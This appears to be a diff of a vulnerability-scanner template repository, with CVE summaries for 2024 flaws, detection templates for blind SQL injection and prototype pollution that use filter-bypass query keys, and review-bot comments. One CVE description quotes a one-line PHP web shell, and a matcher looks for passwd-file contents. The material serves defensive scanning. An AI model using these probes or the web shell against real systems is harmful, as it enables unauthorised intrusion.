{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
@ -2551,6 +2564,7 @@
{"ID":"CVE-2024-36401","Info":{"Name":"GeoServer RCE in Evaluating Property Name Expressions","Severity":"critical","Description":"In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36401.yaml"}
{"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"}
{"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"}
{"ID":"CVE-2024-3656","Info":{"Name":"Keycloak \u003c 24.0.5 - Broken Access Control","Severity":"high","Description":"A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2024/CVE-2024-3656.yaml"}
{"ID":"CVE-2024-36683","Info":{"Name":"PrestaShop productsalert - SQL Injection","Severity":"critical","Description":"In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36683.yaml"}
{"ID":"CVE-2024-3673","Info":{"Name":"Web Directory Free \u003c 1.7.3 - Local File Inclusion","Severity":"critical","Description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-3673.yaml"}
{"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"}
@ -2573,6 +2587,7 @@
{"ID":"CVE-2024-38856","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38856.yaml"}
{"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"}
{"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"}
{"ID":"CVE-2024-39713","Info":{"Name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39713.yaml"}
{"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"}
{"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"}
{"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"}
@ -2587,21 +2602,25 @@
{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"}
{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43360","Info":{"Name":"ZoneMinder - SQL Injection","Severity":"critical","Description":"ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43360.yaml"}
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45488","Info":{"Name":"SafeGuard for Privileged Passwords \u003c 7.5.2 - Authentication Bypass","Severity":"critical","Description":"One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45488.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46310","Info":{"Name":"FXServer \u003c v9601 - Information Exposure","Severity":"medium","Description":"Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-46310.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
@ -2621,6 +2640,7 @@
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
{"ID":"CVE-2024-5910","Info":{"Name":"Palo Alto Expedition - Admin Account Takeover","Severity":"critical","Description":"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-5910.yaml"}
{"ID":"CVE-2024-5932","Info":{"Name":"GiveWP - PHP Object Injection","Severity":"critical","Description":"The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5932.yaml"}
{"ID":"CVE-2024-5936","Info":{"Name":"PrivateGPT \u003c 0.5.0 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in imartinez/privategpt version 0.5.0 due to improper handling of the 'file' parameter. This vulnerability allows attackers to redirect users to a URL specified by user-controlled input without proper validation or sanitization.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-5936.yaml"}
{"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"}
@ -2670,6 +2690,7 @@
{"ID":"CVE-2024-8503","Info":{"Name":"VICIdial - SQL Injection","Severity":"critical","Description":"An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8503.yaml"}
{"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"}
{"ID":"CVE-2024-8522","Info":{"Name":"LearnPress WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"}
{"ID":"CVE-2024-8698","Info":{"Name":"Keycloak - SAML Core Package Signature Validation Flaw","Severity":"high","Description":"A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2024/CVE-2024-8698.yaml"}
{"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"}
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}


@ -1 +1 @@
223d0a251042512ea9601274d93c16f4
927dc1164f3b6743928b787a83f64ae5


@ -494,5 +494,4 @@ http:
- "SQ200: No table "
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
# digest: 4b0a00483046022100966a70c7d7be953b8599b861fc338b7cd07ccdf1cbb93d789e504acd7e17088f022100c5479e75293b0b3f63f68b1f52124a544e68ac11490c58b0b8978a07cd882339:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220312a2619a0bef4a0328b000b96cf09ecf42226ee9b872709c7a0be7b7816f656022007e96f4d42fb5ee12201d386a057c06a4c1f3f38e4264a6c2459ba1766d3d0e4:922c64590222798bb761d5b6d8e72950


@ -6,7 +6,7 @@ info:
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time-based,blind
tags: time-based-sqli,sqli,dast,blind
flow: http(1) && http(2)
@ -19,6 +19,7 @@ http:
- type: dsl
dsl:
- "duration<=7"
internal: true
- raw:
- |
@ -47,4 +48,4 @@ http:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202529d892c477e15738b4e5537c797e61478cb79afff398f2dc90fca1769751960221009f10ae4d72053768a125dfa0aa2497b24e5150a453c8536c0cea34d4e5d4a5ae:922c64590222798bb761d5b6d8e72950
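Review bot: The first matcher `duration<=7` is now `internal: true`, which makes it a silent precondition for `flow: http(1) && http(2)`, yet neither it nor the second matcher `duration>=7 && duration <=16` says where 7 and 16 come from. I would add a comment above the first matcher, for example `# baseline gate: continue only when the first request answers within 7s`, and one above the second tying the window to the delay the second request asks for; the raw requests are outside the visible hunks, so that value needs confirming. Both bounds also include exactly 7, so writing the baseline as `duration<7` would keep the two conditions disjoint. The spacing in `duration <=16` is inconsistent with `duration>=7`.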


@ -5,7 +5,8 @@ info:
author: pdteam
severity: medium
metadata:
max-request: 4
max-request: 8
verified: true
tags: headless
headless:
@ -17,7 +18,7 @@ headless:
- action: waitload
- action: script
name: extract
name: extract1
args:
code: |
() => {
@ -25,7 +26,7 @@ headless:
}
matchers:
- type: word
part: extract
part: extract1
words:
- "polluted"
@ -88,4 +89,85 @@ headless:
part: extract4
words:
- "polluted"
# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract5
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract5
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract6
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract6
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract7
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract7
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract8
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract8
words:
- "polluted"
# digest: 490a004630440220332d2eb43e6ee2b3b48ca3bd7b953693814ce81ca3c34fa2036bcbfc93482d6a02204efa7ecda7b863d46e7a42d80500a115097ba317b63547ed5c07a4124338dafc:922c64590222798bb761d5b6d8e72950
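Review bot: The four steps added after `extract4` differ from one another only in the `url` and the `name`/`part` pair, and nothing says why the keys are spelled `__pro__proto__to__` and `constconstructorructor` / `protoprototypetype`. These look like variants for pages that strip `__proto__`, `constructor` and `prototype` from query keys in a single pass, which would leave the original key behind. If that is the intent, a comment above the first added step such as `# extract5-8: keys that survive a one-pass strip of __proto__/constructor/prototype` would tell whoever triages a hit which weakness fired. The template description could also state that a match on steps 5–8 means filtering exists but is not applied until the key is stable, so the remedy is to reject such keys rather than strip them. The earlier steps are mostly outside the visible hunks.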


@ -1 +1 @@
6.3.6.1
6.3.6.3


@ -1 +1 @@
7.86
7.87


@ -1 +1 @@
4.4.4
4.4.6


@ -1 +1 @@
4.1.5
4.1.6


@ -1 +1 @@
3.2.6
3.2.7


@ -1 +1 @@
3.24.6
3.24.7


@ -1 +1 @@
3.2.8
3.2.9


@ -1 +1 @@
1.35.1
1.36.0


@ -1 +1 @@
1.6.42
1.6.43


@ -1 +1 @@
3.0.12
3.0.14


@ -1 +1 @@
3.5.1
3.5.2


@ -1 +1 @@
13.9
13.9.1


@ -1 +1 @@
3.3.1
3.3.2


@ -1 +1 @@
6.5.1
6.5.2


@ -1 +1 @@
5.3.0
5.3.1


@ -1 +1 @@
4.12
4.14


@ -1 +1 @@
5.77
5.81


@ -1 +1 @@
8.5.6
8.5.7


@ -1 +1 @@
3.1.14
3.1.15


@ -1 +1 @@
2.3.1
2.4.0


@ -1 +1 @@
2.16.5
2.16.6


@ -1 +1 @@
4.10.56
4.10.59


@ -1 +1 @@
1.0.229
1.0.230


@ -1 +1 @@
3.5.1.23
3.5.1.24


@ -1 +1 @@
2.4.3
2.4.4


@ -1 +1 @@
2.7.6
2.7.7


@ -1 +1 @@
8.7.0
8.8.0


@ -1 +1 @@
8.3.0
8.3.1


@ -1 +1 @@
2.9.2
2.9.3


@ -1 +1 @@
9.0.40
9.0.43


@ -1 +1 @@
2.6.12
2.6.13


@ -1 +1 @@
1.9.1.3
1.9.1.4


@ -61,5 +61,5 @@ http:
- type: regex
regex:
- "root=.*:0:0"
# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950
- "root:.*:0:0:"
